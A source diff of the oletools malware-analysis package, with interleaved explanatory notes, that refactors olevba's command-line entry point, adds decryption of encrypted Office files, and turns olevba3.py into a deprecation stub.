+def parse_args(cmd_line_args=None):
+ """ Parse command line arguments (the given ones, or sys.argv by default) """
+
DEFAULT_LOG_LEVEL = "warning" # Default log level
LOG_LEVELS = {
'debug': logging.DEBUG,
@@ -3291,7 +4114,11 @@ def main():
parser.add_option("-r", action="store_true", dest="recursive",
help='find files recursively in subdirectories.')
parser.add_option("-z", "--zip", dest='zip_password', type='str', default=None,
- help='if the file is a zip archive, open all files from it, using the provided password (requires Python 2.6+)')
+ help='if the file is a zip archive, open all files from it, using the provided password.')
+ parser.add_option("-p", "--password", type='str', action='append',
+ default=[],
+ help='if encrypted office files are encountered, try '
+ 'decryption with this password. May be repeated.')
parser.add_option("-f", "--zipfname", dest='zip_fname', type='str', default='*',
help='if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)')
# output mode; could make this even simpler with add_option(type='choice') but that would make
@@ -3323,69 +4150,205 @@ def main():
help="Attempt to deobfuscate VBA expressions (slow)")
parser.add_option('--relaxed', dest="relaxed", action="store_true", default=False,
help="Do not raise errors if opening of substream fails")
+ parser.add_option('--pcode', dest="pcode", action="store_true", default=False,
+ help="Disassemble and display the P-code (using pcodedmp)")
+ parser.add_option('--no-xlm', dest="no_xlm", action="store_true", default=False,
+ help="Do not extract XLM Excel macros. This may speed up analysis of large files.")
- (options, args) = parser.parse_args()
+ (options, args) = parser.parse_args(cmd_line_args)
# Print help if no arguments are passed
if len(args) == 0:
- print('olevba %s - http://decalage.info/python/oletools' % __version__)
+ # print banner with version
+ python_version = '%d.%d.%d' % sys.version_info[0:3]
+ print('olevba %s on Python %s - http://decalage.info/python/oletools' %
+ (__version__, python_version))
print(__doc__)
parser.print_help()
sys.exit(RETURN_WRONG_ARGS)
+ options.loglevel = LOG_LEVELS[options.loglevel]
+
+ return options, args
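Editor's note: accepting an optional `cmd_line_args` argument that falls back to `sys.argv` is what makes this parser unit-testable. A minimal, self-contained sketch of the same pattern (the option and usage string here are illustrative, not olevba's actual set):

```python
import optparse

def parse_args(cmd_line_args=None):
    """Parse the given arguments, or sys.argv[1:] when cmd_line_args is None."""
    parser = optparse.OptionParser(usage='demo [options] <file>')
    parser.add_option('-r', action='store_true', dest='recursive', default=False,
                      help='find files recursively in subdirectories.')
    # optparse itself falls back to sys.argv[1:] when args is None
    return parser.parse_args(cmd_line_args)

# In a unit test, arguments can be injected directly instead of via sys.argv:
options, args = parse_args(['-r', 'sample.doc'])
```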
+
+
+def process_file(filename, data, container, options, crypto_nesting=0):
+ """
+ Part of main function that processes a single file.
+
+ This handles exceptions and encryption.
+
+ Returns a single code summarizing the status of processing of this file
+ """
+ try:
+ # Open the file
+ vba_parser = VBA_Parser_CLI(filename, data=data, container=container,
+ relaxed=options.relaxed)
+
+ if options.output_mode == 'detailed':
+ # fully detailed output
+ vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
+ display_code=options.display_code,
+ hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
+ show_deobfuscated_code=options.show_deobfuscated_code,
+ deobfuscate=options.deobfuscate, pcode=options.pcode, no_xlm=options.no_xlm)
+ elif options.output_mode == 'triage':
+ # summarized output for triage:
+ vba_parser.process_file_triage(show_decoded_strings=options.show_decoded_strings,
+ deobfuscate=options.deobfuscate, no_xlm=options.no_xlm)
+ elif options.output_mode == 'json':
+ print_json(
+ vba_parser.process_file_json(show_decoded_strings=options.show_decoded_strings,
+ display_code=options.display_code,
+ hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
+ show_deobfuscated_code=options.show_deobfuscated_code,
+ deobfuscate=options.deobfuscate, no_xlm=options.no_xlm))
+ else: # (should be impossible)
+ raise ValueError('unexpected output mode: "{0}"!'.format(options.output_mode))
+
+ # even if processing succeeds, file might still be encrypted
+ log.debug('Checking for encryption (normal)')
+ if not crypto.is_encrypted(filename):
+ log.debug('no encryption detected')
+ return RETURN_OK
+ except Exception as exc:
+ log.debug('Checking for encryption (after exception)')
+ if crypto.is_encrypted(filename):
+ pass # deal with this below
+ else:
+ if isinstance(exc, (SubstreamOpenError, UnexpectedDataError)):
+ if options.output_mode in ('triage', 'unspecified'):
+ print('%-12s %s - Error opening substream or unexpected ' \
+ 'content' % ('?', filename))
+ elif options.output_mode == 'json':
+ print_json(file=filename, type='error',
+ error=type(exc).__name__, message=str(exc))
+ else:
+ log.exception('Error opening substream or unexpected '
+ 'content in %s' % filename)
+ return RETURN_OPEN_ERROR
+ elif isinstance(exc, FileOpenError):
+ if options.output_mode in ('triage', 'unspecified'):
+ print('%-12s %s - File format not supported' % ('?', filename))
+ elif options.output_mode == 'json':
+ print_json(file=filename, type='error',
+ error=type(exc).__name__, message=str(exc))
+ else:
+ log.exception('Failed to open %s -- probably not supported!' % filename)
+ return RETURN_OPEN_ERROR
+ elif isinstance(exc, ProcessingError):
+ if options.output_mode in ('triage', 'unspecified'):
+ print('%-12s %s - %s' % ('!ERROR', filename, exc.orig_exc))
+ elif options.output_mode == 'json':
+ print_json(file=filename, type='error',
+ error=type(exc).__name__,
+ message=str(exc.orig_exc))
+ else:
+ log.exception('Error processing file %s (%s)!'
+ % (filename, exc.orig_exc))
+ return RETURN_PARSE_ERROR
+ else:
+ raise # let caller deal with this
+
+ # we reach this point only if file is encrypted
+ # check if this is an encrypted file in an encrypted file in an ...
+ if crypto_nesting >= crypto.MAX_NESTING_DEPTH:
+ raise crypto.MaxCryptoNestingReached(crypto_nesting, filename)
+
+ decrypted_file = None
+ try:
+ log.debug('Checking encryption passwords {}'.format(options.password))
+ passwords = options.password + crypto.DEFAULT_PASSWORDS
+ decrypted_file = crypto.decrypt(filename, passwords)
+ if not decrypted_file:
+ log.error('Decryption failed; run with debug output for details')
+ raise crypto.WrongEncryptionPassword(filename)
+ log.info('Working on decrypted file')
+ return process_file(decrypted_file, data, container or filename,
+ options, crypto_nesting+1)
+ except Exception:
+ raise
+ finally: # clean up
+ try:
+ log.debug('Removing crypt temp file {}'.format(decrypted_file))
+ os.unlink(decrypted_file)
+ except Exception: # e.g. file does not exist or is None
+ pass
+ # should never be reached: decryption either succeeded (and returned) or raised
+ raise Exception('Programming error -- should never have reached this!')
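Editor's note: the `crypto_nesting` counter above guards the recursive call against files encrypted inside encrypted files, ad infinitum. A standalone sketch of that depth-limit pattern; `MAX_NESTING_DEPTH`, the exception class, and the `'enc:'` marker are hypothetical stand-ins for the real `crypto` module:

```python
MAX_NESTING_DEPTH = 10  # stand-in for crypto.MAX_NESTING_DEPTH

class MaxCryptoNestingReached(Exception):
    """Raised when decryption layers exceed the allowed depth."""

def process_layer(payload, crypto_nesting=0):
    """Peel one mock 'encryption' layer per recursion, up to the depth limit."""
    if crypto_nesting >= MAX_NESTING_DEPTH:
        raise MaxCryptoNestingReached(crypto_nesting)
    if payload.startswith('enc:'):
        # recurse on the "decrypted" content, one level deeper
        return process_layer(payload[4:], crypto_nesting + 1)
    return payload
```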
+
+
+def main(cmd_line_args=None):
+ """
+ Main function, called when olevba is run from the command line
+
+ Optional argument: command line arguments to be forwarded to the
+ OptionParser in parse_args. By default (cmd_line_args=None), sys.argv is
+ used. This option was mainly added for unit testing.
+ """
+ options, args = parse_args(cmd_line_args)
+
# provide info about tool and its version
if options.output_mode == 'json':
- # prints opening [
+ # print first json entry with meta info and opening '['
print_json(script_name='olevba', version=__version__,
url='http://decalage.info/python/oletools',
- type='MetaInformation')
+ type='MetaInformation', _json_is_first=True)
else:
- print('olevba %s - http://decalage.info/python/oletools' % __version__)
+ # print banner with version
+ python_version = '%d.%d.%d' % sys.version_info[0:3]
+ print('olevba %s on Python %s - http://decalage.info/python/oletools' %
+ (__version__, python_version))
- logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s')
+ logging.basicConfig(level=options.loglevel, format='%(levelname)-8s %(message)s')
# enable logging in the modules:
enable_logging()
- # Old display with number of items detected:
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % ('Type', 'Macros', 'AutoEx', 'Susp.', 'IOCs', 'HexStr')
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % ('-'*8, '-'*7, '-'*7, '-'*7, '-'*7, '-'*7)
-
# with the option --reveal, make sure --deobf is also enabled:
if options.show_deobfuscated_code and not options.deobfuscate:
- log.info('set --deobf because --reveal was set')
+ log.debug('set --deobf because --reveal was set')
options.deobfuscate = True
if options.output_mode == 'triage' and options.show_deobfuscated_code:
- log.info('ignoring option --reveal in triage output mode')
+ log.debug('ignoring option --reveal in triage output mode')
+
+ # gather info on all files that must be processed
+ # ignore directory names stored in zip files:
+ all_input_info = tuple((container, filename, data) for
+ container, filename, data in xglob.iter_files(
+ args, recursive=options.recursive,
+ zip_password=options.zip_password,
+ zip_fname=options.zip_fname)
+ if not (container and filename.endswith('/')))
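Editor's note: gathering all inputs up front (while skipping directory entries stored in zip archives) is what lets the code below choose 'detailed' output for a single file and 'triage' for many. A reduced sketch of that filter, with `gather_inputs` and the two-element tuples being hypothetical simplifications of `xglob.iter_files` output:

```python
def gather_inputs(entries):
    """Drop directory entries (paths ending in '/') found inside archives.

    Each entry is a (container, filename) pair; container is None for
    files read directly from disk.
    """
    return tuple((container, name) for container, name in entries
                 if not (container and name.endswith('/')))

inputs = gather_inputs([('z.zip', 'a/'), ('z.zip', 'a/b.doc'), (None, 'c.doc')])
```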
+
+ # specify output mode if options -t, -d and -j were not specified
+ if options.output_mode == 'unspecified':
+ if len(all_input_info) == 1:
+ options.output_mode = 'detailed'
+ else:
+ options.output_mode = 'triage'
- # Column headers (do not know how many files there will be yet, so if no output_mode
- # was specified, we will print triage for first file --> need these headers)
- if options.output_mode in ('triage', 'unspecified'):
+ # Column headers for triage mode
+ if options.output_mode == 'triage':
print('%-12s %-65s' % ('Flags', 'Filename'))
print('%-12s %-65s' % ('-' * 11, '-' * 65))
previous_container = None
count = 0
container = filename = data = None
- vba_parser = None
return_code = RETURN_OK
try:
- for container, filename, data in xglob.iter_files(args, recursive=options.recursive,
- zip_password=options.zip_password, zip_fname=options.zip_fname):
- # ignore directory names stored in zip files:
- if container and filename.endswith('/'):
- continue
-
+ for container, filename, data in all_input_info:
# handle errors from xglob
if isinstance(data, Exception):
if isinstance(data, PathNotFoundException):
- if options.output_mode in ('triage', 'unspecified'):
+ if options.output_mode == 'triage':
print('%-12s %s - File not found' % ('?', filename))
elif options.output_mode != 'json':
log.error('Given path %r does not exist!' % filename)
return_code = RETURN_FILE_NOT_FOUND if return_code == 0 \
else RETURN_SEVERAL_ERRS
else:
- if options.output_mode in ('triage', 'unspecified'):
+ if options.output_mode == 'triage':
print('%-12s %s - Failed to read from zip file %s' % ('?', filename, container))
elif options.output_mode != 'json':
log.error('Exception opening/reading %r from zip file %r: %s'
@@ -3397,94 +4360,42 @@ def main():
error=type(data).__name__, message=str(data))
continue
- try:
- # Open the file
- vba_parser = VBA_Parser_CLI(filename, data=data, container=container,
- relaxed=options.relaxed)
-
- if options.output_mode == 'detailed':
- # fully detailed output
- vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate)
- elif options.output_mode in ('triage', 'unspecified'):
- # print container name when it changes:
- if container != previous_container:
- if container is not None:
- print('\nFiles in %s:' % container)
- previous_container = container
- # summarized output for triage:
- vba_parser.process_file_triage(show_decoded_strings=options.show_decoded_strings,
- deobfuscate=options.deobfuscate)
- elif options.output_mode == 'json':
- print_json(
- vba_parser.process_file_json(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate))
- else: # (should be impossible)
- raise ValueError('unexpected output mode: "{0}"!'.format(options.output_mode))
- count += 1
-
- except (SubstreamOpenError, UnexpectedDataError) as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - Error opening substream or uenxpected ' \
- 'content' % ('?', filename))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__, message=str(exc))
- else:
- log.exception('Error opening substream or unexpected '
- 'content in %s' % filename)
- return_code = RETURN_OPEN_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- except FileOpenError as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - File format not supported' % ('?', filename))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__, message=str(exc))
- else:
- log.exception('Failed to open %s -- probably not supported!' % filename)
- return_code = RETURN_OPEN_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- except ProcessingError as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - %s' % ('!ERROR', filename, exc.orig_exc))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__,
- message=str(exc.orig_exc))
- else:
- log.exception('Error processing file %s (%s)!'
- % (filename, exc.orig_exc))
- return_code = RETURN_PARSE_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- finally:
- if vba_parser is not None:
- vba_parser.close()
+ if options.output_mode == 'triage':
+ # print container name when it changes:
+ if container != previous_container:
+ if container is not None:
+ print('\nFiles in %s:' % container)
+ previous_container = container
+
+ # process the file, handling errors and encryption
+ curr_return_code = process_file(filename, data, container, options)
+ count += 1
+
+ # adjust overall return code
+ if curr_return_code == RETURN_OK:
+ continue # do not modify overall return code
+ if return_code == RETURN_OK:
+ return_code = curr_return_code # first error return code
+ else:
+ return_code = RETURN_SEVERAL_ERRS # several errors
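Editor's note: the aggregation above keeps the first error code and collapses any further errors into a single "several errors" code. The same logic, isolated (the constant values are hypothetical; only their relative meaning matters):

```python
RETURN_OK = 0
RETURN_SEVERAL_ERRS = 99  # hypothetical value for "several errors"

def combine_return_codes(codes):
    """Keep the first non-OK code; any second error collapses to SEVERAL."""
    overall = RETURN_OK
    for code in codes:
        if code == RETURN_OK:
            continue  # do not modify overall return code
        if overall == RETURN_OK:
            overall = code  # first error return code
        else:
            overall = RETURN_SEVERAL_ERRS  # several errors
    return overall
```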
if options.output_mode == 'triage':
- print('\n(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, TXT=Text, M=Macros, ' \
+ print('\n(Flags: OpX=OpenXML, XML=Word2003XML, FlX=FlatOPC XML, MHT=MHTML, TXT=Text, M=Macros, ' \
'A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, ' \
'B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)\n')
- if count == 1 and options.output_mode == 'unspecified':
- # if options -t, -d and -j were not specified and it's a single file, print details:
- vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate)
-
if options.output_mode == 'json':
# print last json entry (a last one without a comma) and closing ]
print_json(type='MetaInformation', return_code=return_code,
n_processed=count, _json_is_last=True)
+ except crypto.CryptoErrorBase as exc:
+ log.exception('Problems with encryption in main: {}'.format(exc),
+ exc_info=True)
+ if return_code == RETURN_OK:
+ return_code = RETURN_ENCRYPTED
+ else:
+ return_code = RETURN_SEVERAL_ERRS
except Exception as exc:
# some unexpected error, maybe some of the types caught in except clauses
# above were not sufficient. This is very bad, so log complete trace at exception level
diff --git a/oletools/olevba3.py b/oletools/olevba3.py
index 802b3c30..23d65ba8 100644
--- a/oletools/olevba3.py
+++ b/oletools/olevba3.py
@@ -1,260 +1,10 @@
#!/usr/bin/env python
-"""
-olevba.py
-olevba is a script to parse OLE and OpenXML files such as MS Office documents
-(e.g. Word, Excel), to extract VBA Macro code in clear text, deobfuscate
-and analyze malicious macros.
+# olevba3 is a stub that redirects to olevba.py, for backwards compatibility
-Supported formats:
-- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
-- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
-- Word 2003 XML (.xml)
-- Word/Excel Single File Web Page / MHTML (.mht)
-- Publisher (.pub)
+import sys, os, warnings
-Author: Philippe Lagadec - http://www.decalage.info
-License: BSD, see source code or documentation
-
-olevba is part of the python-oletools package:
-http://www.decalage.info/python/oletools
-
-olevba is based on source code from officeparser by John William Davison
-https://github.com/unixfreak0037/officeparser
-"""
-
-# === LICENSE ==================================================================
-
-# olevba is copyright (c) 2014-2017 Philippe Lagadec (http://www.decalage.info)
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
-#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# * Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-# olevba contains modified source code from the officeparser project, published
-# under the following MIT License (MIT):
-#
-# officeparser is copyright (c) 2014 John William Davison
-#
-# Permission is hereby granted, free of charge, to any person obtaining a copy
-# of this software and associated documentation files (the "Software"), to deal
-# in the Software without restriction, including without limitation the rights
-# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-# copies of the Software, and to permit persons to whom the Software is
-# furnished to do so, subject to the following conditions:
-#
-# The above copyright notice and this permission notice shall be included in all
-# copies or substantial portions of the Software.
-#
-# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-# SOFTWARE.
-
-from __future__ import print_function
-
-#------------------------------------------------------------------------------
-# CHANGELOG:
-# 2014-08-05 v0.01 PL: - first version based on officeparser code
-# 2014-08-14 v0.02 PL: - fixed bugs in code, added license from officeparser
-# 2014-08-15 PL: - fixed incorrect value check in projecthelpfilepath Record
-# 2014-08-15 v0.03 PL: - refactored extract_macros to support OpenXML formats
-# and to find the VBA project root anywhere in the file
-# 2014-11-29 v0.04 PL: - use olefile instead of OleFileIO_PL
-# 2014-12-05 v0.05 PL: - refactored most functions into a class, new API
-# - added detect_vba_macros
-# 2014-12-10 v0.06 PL: - hide first lines with VB attributes
-# - detect auto-executable macros
-# - ignore empty macros
-# 2014-12-14 v0.07 PL: - detect_autoexec() is now case-insensitive
-# 2014-12-15 v0.08 PL: - improved display for empty macros
-# - added pattern extraction
-# 2014-12-25 v0.09 PL: - added suspicious keywords detection
-# 2014-12-27 v0.10 PL: - added OptionParser, main and process_file
-# - uses xglob to scan several files with wildcards
-# - option -r to recurse subdirectories
-# - option -z to scan files in password-protected zips
-# 2015-01-02 v0.11 PL: - improved filter_vba to detect colons
-# 2015-01-03 v0.12 PL: - fixed detect_patterns to detect all patterns
-# - process_file: improved display, shows container file
-# - improved list of executable file extensions
-# 2015-01-04 v0.13 PL: - added several suspicious keywords, improved display
-# 2015-01-08 v0.14 PL: - added hex strings detection and decoding
-# - fixed issue #2, decoding VBA stream names using
-# specified codepage and unicode stream names
-# 2015-01-11 v0.15 PL: - added new triage mode, options -t and -d
-# 2015-01-16 v0.16 PL: - fix for issue #3 (exception when module name="text")
-# - added several suspicious keywords
-# - added option -i to analyze VBA source code directly
-# 2015-01-17 v0.17 PL: - removed .com from the list of executable extensions
-# - added scan_vba to run all detection algorithms
-# - decoded hex strings are now also scanned + reversed
-# 2015-01-23 v0.18 PL: - fixed issue #3, case-insensitive search in code_modules
-# 2015-01-24 v0.19 PL: - improved the detection of IOCs obfuscated with hex
-# strings and StrReverse
-# 2015-01-26 v0.20 PL: - added option --hex to show all hex strings decoded
-# 2015-01-29 v0.21 PL: - added Dridex obfuscation decoding
-# - improved display, shows obfuscation name
-# 2015-02-01 v0.22 PL: - fixed issue #4: regex for URL, e-mail and exe filename
-# - added Base64 obfuscation decoding (contribution from
-# @JamesHabben)
-# 2015-02-03 v0.23 PL: - triage now uses VBA_Scanner results, shows Base64 and
-# Dridex strings
-# - exception handling in detect_base64_strings
-# 2015-02-07 v0.24 PL: - renamed option --hex to --decode, fixed display
-# - display exceptions with stack trace
-# - added several suspicious keywords
-# - improved Base64 detection and decoding
-# - fixed triage mode not to scan attrib lines
-# 2015-03-04 v0.25 PL: - added support for Word 2003 XML
-# 2015-03-22 v0.26 PL: - added suspicious keywords for sandboxing and
-# virtualisation detection
-# 2015-05-06 v0.27 PL: - added support for MHTML files with VBA macros
-# (issue #10 reported by Greg from SpamStopsHere)
-# 2015-05-24 v0.28 PL: - improved support for MHTML files with modified header
-# (issue #11 reported by Thomas Chopitea)
-# 2015-05-26 v0.29 PL: - improved MSO files parsing, taking into account
-# various data offsets (issue #12)
-# - improved detection of MSO files, avoiding incorrect
-# parsing errors (issue #7)
-# 2015-05-29 v0.30 PL: - added suspicious keywords suggested by @ozhermit,
-# Davy Douhine (issue #9), issue #13
-# 2015-06-16 v0.31 PL: - added generic VBA expression deobfuscation (chr,asc,etc)
-# 2015-06-19 PL: - added options -a, -c, --each, --attr
-# 2015-06-21 v0.32 PL: - always display decoded strings which are printable
-# - fix VBA_Scanner.scan to return raw strings, not repr()
-# 2015-07-09 v0.40 PL: - removed usage of sys.stderr which causes issues
-# 2015-07-12 PL: - added Hex function decoding to VBA Parser
-# 2015-07-13 PL: - added Base64 function decoding to VBA Parser
-# 2015-09-06 PL: - improved VBA_Parser, refactored the main functions
-# 2015-09-13 PL: - moved main functions to a class VBA_Parser_CLI
-# - fixed issue when analysis was done twice
-# 2015-09-15 PL: - remove duplicate IOCs from results
-# 2015-09-16 PL: - join long VBA lines ending with underscore before scan
-# - disabled unused option --each
-# 2015-09-22 v0.41 PL: - added new option --reveal
-# - added suspicious strings for PowerShell.exe options
-# 2015-10-09 v0.42 PL: - VBA_Parser: split each format into a separate method
-# 2015-10-10 PL: - added support for text files with VBA source code
-# 2015-11-17 PL: - fixed bug with --decode option
-# 2015-12-16 PL: - fixed bug in main (no options input anymore)
-# - improved logging, added -l option
-# 2016-01-31 PL: - fixed issue #31 in VBA_Parser.open_mht
-# - fixed issue #32 by monkeypatching email.feedparser
-# 2016-02-07 PL: - KeyboardInterrupt is now raised properly
-# 2016-02-20 v0.43 PL: - fixed issue #34 in the VBA parser and vba_chr
-# 2016-02-29 PL: - added Workbook_Activate to suspicious keywords
-# 2016-03-08 v0.44 PL: - added VBA Form strings extraction and analysis
-# 2016-03-04 v0.45 CH: - added JSON output (by Christian Herdtweck)
-# 2016-03-16 CH: - added option --no-deobfuscate (temporary)
-# 2016-04-19 v0.46 PL: - new option --deobf instead of --no-deobfuscate
-# - updated suspicious keywords
-# 2016-05-04 v0.47 PL: - look for VBA code in any stream including orphans
-# 2016-04-28 CH: - return an exit code depending on the results
-# - improved error and exception handling
-# - improved JSON output
-# 2016-05-12 CH: - added support for PowerPoint 97-2003 files
-# 2016-06-06 CH: - improved handling of unicode VBA module names
-# 2016-06-07 CH: - added option --relaxed, stricter parsing by default
-# 2016-06-12 v0.50 PL: - fixed small bugs in VBA parsing code
-# 2016-07-01 PL: - fixed issue #58 with format() to support Python 2.6
-# 2016-07-29 CH: - fixed several bugs including #73 (Mac Roman encoding)
-# 2016-08-31 PL: - added autoexec keyword InkPicture_Painted
-# - detect_autoexec now returns the exact keyword found
-# 2016-09-05 PL: - added autoexec keywords for MS Publisher (.pub)
-# 2016-09-06 PL: - fixed issue #20, is_zipfile on Python 2.6
-# 2016-09-12 PL: - enabled packrat to improve pyparsing performance
-# 2016-10-25 PL: - fixed raise and print statements for Python 3
-# 2016-10-25 PL: - fixed regex bytes strings (PR/issue #100)
-# 2016-11-03 v0.51 PL: - added EnumDateFormats and EnumSystemLanguageGroupsW
-# 2017-04-26 PL: - fixed absolute imports
-
-__version__ = '0.51'
-
-#------------------------------------------------------------------------------
-# TODO:
-# + setup logging (common with other oletools)
-# + add xor bruteforcing like bbharvest
-# + options -a and -c should imply -d
-
-# TODO later:
-# + performance improvement: instead of searching each keyword separately,
-# first split vba code into a list of words (per line), then check each
-# word against a dict. (or put vba words into a set/dict?)
-# + for regex, maybe combine them into a single re with named groups?
-# + add Yara support, include sample rules? plugins like balbuzard?
-# + add balbuzard support
-# + output to file (replace print by file.write, sys.stdout by default)
-# + look for VBA in embedded documents (e.g. Excel in Word)
-# + support SRP streams (see Lenny's article + links and sample)
-# - python 3.x support
-# - check VBA macros in Visio, Access, Project, etc
-# - extract_macros: convert to a class, split long function into smaller methods
-# - extract_macros: read bytes from stream file objects instead of strings
-# - extract_macros: use combined struct.unpack instead of many calls
-# - all except clauses should target specific exceptions
-
-#------------------------------------------------------------------------------
-# REFERENCES:
-# - [MS-OVBA]: Microsoft Office VBA File Format Structure
-# http://msdn.microsoft.com/en-us/library/office/cc313094%28v=office.12%29.aspx
-# - officeparser: https://github.com/unixfreak0037/officeparser
-
-
-#--- IMPORTS ------------------------------------------------------------------
-
-import sys, logging, os
-import struct
-from _io import StringIO,BytesIO
-import math
-import zipfile
-import re
-import optparse
-import binascii
-import base64
-import zlib
-import email # for MHTML parsing
-import string # for printable
-import json # for json output mode (argument --json)
-
-# import lxml or ElementTree for XML parsing:
-try:
- # lxml: best performance for XML processing
- import lxml.etree as ET
-except ImportError:
- try:
- # Python 2.5+: batteries included
- import xml.etree.cElementTree as ET
- except ImportError:
- try:
- # Python <2.5: standalone ElementTree install
- import elementtree.cElementTree as ET
- except ImportError:
- raise(ImportError, "lxml or ElementTree are not installed, " \
- + "see http://codespeak.net/lxml " \
- + "or http://effbot.org/zone/element-index.htm")
+warnings.warn('olevba3 is deprecated, olevba should be used instead.', DeprecationWarning)
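Editor's note: a module-level `warnings.warn(..., DeprecationWarning)` like the stub above can be verified in a test by recording warnings. A sketch of that check; `load_legacy_module` is a hypothetical wrapper standing in for importing the stub:

```python
import warnings

def load_legacy_module():
    """Emit the same DeprecationWarning the olevba3 stub issues on import."""
    warnings.warn('olevba3 is deprecated, olevba should be used instead.',
                  DeprecationWarning)

# Capture the warning, as a unit test for the stub would:
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter('always')  # ensure DeprecationWarning is not suppressed
    load_legacy_module()
```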
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
@@ -262,3204 +12,13 @@
# And to enable Python 2+3 compatibility, we need to use absolute imports,
# so we add the oletools parent folder to sys.path (absolute+normalized path):
_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-# print('_thismodule_dir = %r' % _thismodule_dir)
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
+if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
-from oletools.thirdparty.prettytable import prettytable
-from oletools.thirdparty.xglob import xglob, PathNotFoundException
-from oletools.thirdparty.pyparsing.pyparsing import \
- CaselessKeyword, CaselessLiteral, Combine, Forward, Literal, \
- Optional, QuotedString,Regex, Suppress, Word, WordStart, \
- alphanums, alphas, hexnums,nums, opAssoc, srange, \
- infixNotation, ParserElement
-import oletools.ppt_parser as ppt_parser
-
-# monkeypatch email to fix issue #32:
-# allow header lines without ":"
-import email.feedparser
-email.feedparser.headerRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:?|[\t ])')
-
-# === PYTHON 2+3 SUPPORT ======================================================
-
-if sys.version_info[0] <= 2:
- # Python 2.x
- if sys.version_info[1] <= 6:
- # Python 2.6
- # use is_zipfile backported from Python 2.7:
- from thirdparty.zipfile27 import is_zipfile
- else:
- # Python 2.7
- from zipfile import is_zipfile
-else:
- # Python 3.x+
- from zipfile import is_zipfile
- # xrange is now called range:
- xrange = range
-
-
-# === PYTHON 3.0 - 3.4 SUPPORT ======================================================
-
-# From https://gist.github.com/ynkdir/867347/c5e188a4886bc2dd71876c7e069a7b00b6c16c61
-
-if sys.version_info >= (3, 0) and sys.version_info < (3, 5):
- import codecs
-
- _backslashreplace_errors = codecs.lookup_error("backslashreplace")
-
- def backslashreplace_errors(exc):
